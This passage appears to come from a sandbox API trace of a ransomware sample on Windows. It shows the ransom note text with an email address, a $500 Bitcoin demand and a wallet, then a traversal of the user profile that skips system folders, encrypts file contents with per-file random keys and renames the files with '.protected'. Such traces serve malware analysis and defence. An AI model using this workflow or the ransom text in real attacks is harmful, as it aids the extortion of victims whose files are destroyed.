service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.384] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) 
returned 1 [0092.385] lstrlenA (lpString="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") returned 684 [0092.385] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0092.385] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.385] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0092.385] CloseHandle (hObject=0xa4) returned 1 [0092.385] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.385] lstrcmpiW (lpString1="My Documents", lpString2="Windows") returned -1 [0092.386] lstrcmpiW (lpString1="My Documents", lpString2="Program Files") returned -1 [0092.386] lstrcmpiW (lpString1="My Documents", lpString2="Program Files (x86)") returned -1 [0092.386] lstrcmpiW (lpString1="My Documents", lpString2="$Recycle.bin") returned 1 [0092.386] lstrcmpiW (lpString1="My Documents", lpString2="System Volume Information") returned -1 [0092.386] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents") returned 46 [0092.386] lstrcmpW (lpString1="My Documents", lpString2=".") returned 1 [0092.386] lstrcmpW (lpString1="My Documents", lpString2="..") returned 1 [0092.386] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*") returned 48 [0092.386] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", 
lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0092.386] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.386] lstrcmpiW (lpString1="NetHood", lpString2="Windows") returned -1 [0092.386] lstrcmpiW (lpString1="NetHood", lpString2="Program Files") returned -1 [0092.386] lstrcmpiW (lpString1="NetHood", lpString2="Program Files (x86)") returned -1 [0092.386] lstrcmpiW (lpString1="NetHood", lpString2="$Recycle.bin") returned 1 [0092.386] lstrcmpiW (lpString1="NetHood", lpString2="System Volume Information") returned -1 [0092.386] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood") returned 41 [0092.386] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1 [0092.386] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1 [0092.386] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*") returned 43 [0092.386] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0092.386] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.386] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="Windows") returned -1 [0092.386] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="Program Files") returned -1 [0092.386] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="Program Files (x86)") returned -1 [0092.386] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="$Recycle.bin") returned 1 [0092.386] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="System Volume Information") returned -1 [0092.386] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned 44 [0092.386] StrStrIW (lpFirst="NTUSER.DAT", 
lpSrch=".protected") returned 0x0 [0092.386] lstrcmpW (lpString1="NTUSER.DAT", lpString2="RESTORE_FILES.txt") returned -1 [0092.386] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0092.386] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0092.386] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.386] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.386] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="Windows") returned -1 [0092.387] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="Program Files") returned -1 [0092.387] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="Program Files (x86)") returned -1 [0092.387] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="$Recycle.bin") returned 1 [0092.387] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="System Volume Information") returned -1 [0092.387] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned 49 [0092.387] StrStrIW (lpFirst="ntuser.dat.LOG1", lpSrch=".protected") returned 0x0 [0092.387] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2="RESTORE_FILES.txt") returned -1 [0092.387] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0092.387] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0092.387] 
CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.387] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.387] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="Windows") returned -1 [0092.387] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="Program Files") returned -1 [0092.387] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="Program Files (x86)") returned -1 [0092.387] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="$Recycle.bin") returned 1 [0092.387] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="System Volume Information") returned -1 [0092.387] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned 49 [0092.387] StrStrIW (lpFirst="ntuser.dat.LOG2", lpSrch=".protected") returned 0x0 [0092.387] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2="RESTORE_FILES.txt") returned -1 [0092.387] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0092.387] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0092.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.387] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.387] 
lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="Windows") returned -1 [0092.387] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="Program Files") returned -1 [0092.387] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="Program Files (x86)") returned -1 [0092.387] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="$Recycle.bin") returned 1 [0092.387] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="System Volume Information") returned -1 [0092.387] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 89 [0092.387] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".protected") returned 0x0 [0092.387] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="RESTORE_FILES.txt") returned -1 [0092.387] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0092.387] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0092.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.388] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.388] lstrcmpiW 
(lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="Windows") returned -1 [0092.388] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="Program Files") returned -1 [0092.388] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="Program Files (x86)") returned -1 [0092.388] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="$Recycle.bin") returned 1 [0092.388] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="System Volume Information") returned -1 [0092.388] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 126 [0092.388] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".protected") returned 0x0 [0092.388] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="RESTORE_FILES.txt") returned -1 [0092.388] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0092.388] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0092.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.388] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.388] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="Windows") returned -1 [0092.388] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="Program Files") returned -1 [0092.388] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="Program Files (x86)") returned -1 [0092.388] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="$Recycle.bin") returned 1 [0092.388] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="System Volume Information") returned -1 [0092.388] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 126 [0092.388] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".protected") returned 0x0 [0092.388] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="RESTORE_FILES.txt") returned -1 [0092.388] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0092.388] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0092.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.388] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.388] lstrcmpiW (lpString1="ntuser.ini", lpString2="Windows") returned -1 [0092.388] lstrcmpiW (lpString1="ntuser.ini", lpString2="Program Files") returned -1 [0092.388] lstrcmpiW (lpString1="ntuser.ini", lpString2="Program Files (x86)") returned -1 [0092.388] lstrcmpiW (lpString1="ntuser.ini", lpString2="$Recycle.bin") returned 1 [0092.388] lstrcmpiW (lpString1="ntuser.ini", lpString2="System Volume Information") returned -1 [0092.388] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 44 [0092.388] StrStrIW (lpFirst="ntuser.ini", lpSrch=".protected") returned 0x0 [0092.388] lstrcmpW (lpString1="ntuser.ini", lpString2="RESTORE_FILES.txt") returned -1 [0092.388] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0092.388] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0092.389] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0092.389] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 44 [0092.389] StrStrW (lpFirst="ntuser.ini", lpSrch=".txt") returned 0x0 [0092.389] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 44 [0092.389] StrStrW (lpFirst="ntuser.ini", lpSrch=".rar") returned 0x0 [0092.389] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 44 [0092.389] StrStrW (lpFirst="ntuser.ini", lpSrch=".zip") returned 0x0 [0092.389] ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f3e4*=0x14, lpOverlapped=0x0) returned 1 [0092.390] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffffec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.390] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0x14, lpOverlapped=0x0) returned 1 [0092.391] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.391] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0092.391] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0092.391] CloseHandle (hObject=0xa4) returned 1 [0092.391] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.protected") returned 54 [0092.391] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini.protected")) returned 1 [0092.392] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.392] lstrcmpiW (lpString1="Pictures", lpString2="Windows") returned -1 [0092.392] lstrcmpiW (lpString1="Pictures", lpString2="Program Files") returned -1 [0092.392] lstrcmpiW (lpString1="Pictures", lpString2="Program Files (x86)") returned -1 [0092.392] lstrcmpiW (lpString1="Pictures", lpString2="$Recycle.bin") returned 1 [0092.392] lstrcmpiW (lpString1="Pictures", lpString2="System Volume Information") returned -1 [0092.392] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned 42 [0092.392] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0092.392] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0092.392] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*") returned 44 [0092.392] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0092.393] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.393] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.393] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.393] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.393] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.393] wnsprintfW (in: 
pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\.") returned 44 [0092.393] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.393] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0092.393] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0092.393] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.393] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.393] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.393] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.393] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.393] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.393] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.393] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.393] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\..") returned 45 [0092.393] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.393] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.393] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0092.393] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0092.393] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c 
| out: pbBuffer=0x295f12c) returned 1 [0092.393] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.393] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.393] lstrcmpiW (lpString1="cBERVLmH6 BLFZXq2b.gif", lpString2="Windows") returned -1 [0092.393] lstrcmpiW (lpString1="cBERVLmH6 BLFZXq2b.gif", lpString2="Program Files") returned -1 [0092.393] lstrcmpiW (lpString1="cBERVLmH6 BLFZXq2b.gif", lpString2="Program Files (x86)") returned -1 [0092.393] lstrcmpiW (lpString1="cBERVLmH6 BLFZXq2b.gif", lpString2="$Recycle.bin") returned 1 [0092.393] lstrcmpiW (lpString1="cBERVLmH6 BLFZXq2b.gif", lpString2="System Volume Information") returned -1 [0092.393] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cBERVLmH6 BLFZXq2b.gif") returned 65 [0092.393] StrStrIW (lpFirst="cBERVLmH6 BLFZXq2b.gif", lpSrch=".protected") returned 0x0 [0092.393] lstrcmpW (lpString1="cBERVLmH6 BLFZXq2b.gif", lpString2="RESTORE_FILES.txt") returned -1 [0092.394] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.394] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cBERVLmH6 BLFZXq2b.gif" (normalized: "c:\\users\\5p5nrgjn0js 
